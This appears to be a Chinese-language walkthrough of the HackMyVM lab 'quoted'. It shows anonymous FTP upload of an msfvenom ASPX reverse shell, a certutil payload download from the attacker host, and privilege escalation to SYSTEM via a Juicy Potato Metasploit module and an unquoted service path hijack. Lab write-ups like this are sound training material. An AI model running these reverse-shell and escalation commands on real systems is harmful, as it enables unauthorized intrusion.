hackmyvm_quoted

有ftp服务并且可以匿名登录并且进行get,put操作

ftp> get iisstart.htm
local: iisstart.htm remote: iisstart.htm
229 Entering Extended Passive Mode (|||49166|)
150 Opening ASCII mode data connection.
100% |**********************************************************************************************************************************************************************|   689      667.51 KiB/s    00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (501.00 KiB/s)

└─# cat iisstart.htm  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#B3B3B3;
        margin:0;
}

#container {
        margin-left:auto;
        margin-right:auto;
        text-align:center;
        }

a img {
        border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>                                   

ftp> put user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49167|)
150 Opening ASCII mode data connection.
100% |**********************************************************************************************************************************************************************|    32       17.36 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes sent in 00:00 (11.59 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
10-05-24  12:16PM       <DIR>          aspnet_client
10-05-24  12:27AM                  689 iisstart.htm
07-19-25  02:45PM                   32 user.txt
10-05-24  12:27AM               184946 welcome.png
226 Transfer complete.

所以我们直接上传一个aspx码反弹shell即可

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.56.103 lport=8888 -a x64 --platform Windows -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3412 bytes
Saved as: shell.aspx

找到userflag

c:\Users\quoted\Desktop>whoami /all
whoami /all

KULLANICI B�LG�LER�
-------------------

Kullan�c� ad�                SID     
============================ ========
nt authority\network service S-1-5-20


GRUP B�LG�LER�
--------------

Grup Ad�                             T�r              SID                                                           �znitelikler                                                
==================================== ================ ============================================================= ============================================================
Zorunlu Etiket\Sistem Zorunlu D�zeyi Etiket           S-1-16-16384                                                                                                              
Everyone                             �yi bilinen grup S-1-1-0                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\Users                        Di�er Ad         S-1-5-32-545                                                  Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\SERVICE                 �yi bilinen grup S-1-5-6                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
KONSOL OTURUMU A�MA                  �yi bilinen grup S-1-2-1                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\Authenticated Users     �yi bilinen grup S-1-5-11                                                      Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\This Organization       �yi bilinen grup S-1-5-15                                                      Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\IIS_IUSRS                    Di�er Ad         S-1-5-32-568                                                  Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
LOCAL                                �yi bilinen grup S-1-2-0                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
IIS APPPOOL\DefaultAppPool           �yi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup


AYRICALIK B�LG�LER�
----------------------

Ayr�cal�k Ad�                 A��klama                                                 Durum     
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege ��lem d�zeyi belirtecini de�i�tir                        Devre D���
SeIncreaseQuotaPrivilege      ��lem i�in bellek kotalar� ayarla                        Devre D���
SeSecurityPrivilege           Denetimi ve g�venlik g�nl���n� y�net                     Devre D���
SeShutdownPrivilege           Sistemi kapat                                            Devre D���
SeAuditPrivilege              G�venlik denetimleri olu�tur                             Devre D���
SeChangeNotifyPrivilege       �apraz ge�i� denetimini atla                             Etkin     
SeUndockPrivilege             Bilgisayar� takma biriminden ��kar                       Devre D���
SeImpersonatePrivilege        Kimlik do�rulamas�ndan sonra istemcinin �zelliklerini al Etkin     
SeCreateGlobalPrivilege       Genel nesneler olu�tur                                   Etkin     
SeIncreaseWorkingSetPrivilege ��lem �al��ma k�mesini art�r                             Devre D���
SeTimeZonePrivilege           Saat dilimini de�i�tir                                   Devre D���

很重要的一点是SeImpersonatePrivilege 特权

这个特权允许一个服务账户在认证后模拟（Impersonate）一个客户端。在某些情况下，通过链式利用 Windows 的其他特性（如命名管道或 DCOM），可以滥用这个特权，最终将权限提升到 SYSTEM 或 Administrator。

常用的利用工具和技术通常被称为 "Potato" 系列漏洞，例如 Juicy Potato (或其现代版本 Rogue Potato/PrintSpoofer)。

利用msf做

先去得到一个Meterpreter shell

─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=8081 -f exe > shell1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

上传

└─# python3 -m http.server 80

c:\>certutil -urlcache -split -f http://192.168.56.103:80/shell1.exe c:\shell.exe
certutil -urlcache -split -f http://192.168.56.103:80/shell1.exe c:\shell.exe
****  �evrimi�i  ****
  0000  ...
  1c00
CertUtil: -URLCache komutu ba�ar�yla tamamland�.

c:\>dir
dir
 C s�r�c�s�ndeki birimin etiketi yok.
 Birim Seri Numaras�: D4DC-8644

 c:\ dizini

05.10.2024  13:23    <DIR>          dotNet Update
05.10.2024  00:30    <DIR>          inetpub
14.07.2009  06:20    <DIR>          PerfLogs
05.10.2024  00:12    <DIR>          Program Files
05.10.2024  00:21    <DIR>          Program Files (x86)
19.07.2025  16:33             7.168 shell.exe
05.10.2024  12:16    <DIR>          Users
05.10.2024  00:27    <DIR>          Windows
               1 Dosya            7.168 bayt
               7 Dizin   22.105.141.248 bayt bo�

c:\>shell.exe
shell.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:8081 
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.108 - Command shell session 1 closed.
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.56.108 - Command shell session 2 closed.

这里不知道为什么很快shell就会被终止

下面的步骤应该是

meterpreter > background 
[*] Backgrounding session 1...
msf6 post(windows/gather/enum_patches) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run

msf6 > use exploit/windows/local/ms16_075_reflection_juicy
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set LHOST 192.168.56.105
msf6 exploit(windows/local/ms16_075_reflection_juicy) > exploit 
[*] Started reverse TCP handler on 192.168.56.105:4444 
[+] Target appears to be vulnerable (Windows 7 Service Pack 1)
[*] Launching notepad to host the exploit...
[+] Process 2500 launched.
[*] Reflectively injecting the exploit DLL into 2500...
[*] Injecting exploit into 2500...
[*] Exploit injected. Injecting exploit configuration into 2500...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 192.168.56.123
[*] Meterpreter session 2 opened (192.168.56.105:4444 -> 192.168.56.123:49176) 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

我们用其他的方法做(Unquoted Service Path Exploit)

这里就很明显

没有加双引号 ""，这是典型的未引用路径漏洞（Unquoted Service Path）。

当系统启动服务时，可能会按以下顺序寻找可执行文件：
C:\dotNet.exe
C:\dotNet\Update.exe
C:\dotNet Update\dotnet.exe
可以：
在 C:\ 下写入 dotNet.exe，或在 C:\dotNet\ 下写入 Update.exe
将恶意 payload 命名为 Update.exe
启动 PEService
Payload 将以该服务权限（很可能是 LocalSystem）运行

┌──(root㉿kali)-[/myift/bachang/win]

└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.56.103 lport=2345 -f exe > dotNet.exe 

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x64 from the payload

No encoder specified, outputting raw payload

Payload size: 460 bytes

Final size of exe file: 7168 bytes

把这个码上传

再sc start PEService即可拿到shell

┌──(root㉿kali)-[/myift/bachang/win]

└─# nc -lvnp 2345             

listening on [any] 2345 ...

connect to [192.168.56.103] from (UNKNOWN) [192.168.56.108] 49181

Microsoft Windows [S�r�m 6.1.7601]

Telif Hakk� (c) 2009 Microsoft Corporation. T�m haklar� sakl�d�r.

没有没有 winPEAS、accesschk 等工具的话

reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /v ImagePath

列出服务
检查是否存在空格但没加引号
python脚本直接筛选

c:\>sc qc PEService
sc qc PEService
[SC] QueryServiceConfig BA�ARILI

SERVICE_NAME: PEService
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\dotNet Update\dotnet.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : PEService
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

劫持就是LocalSystem了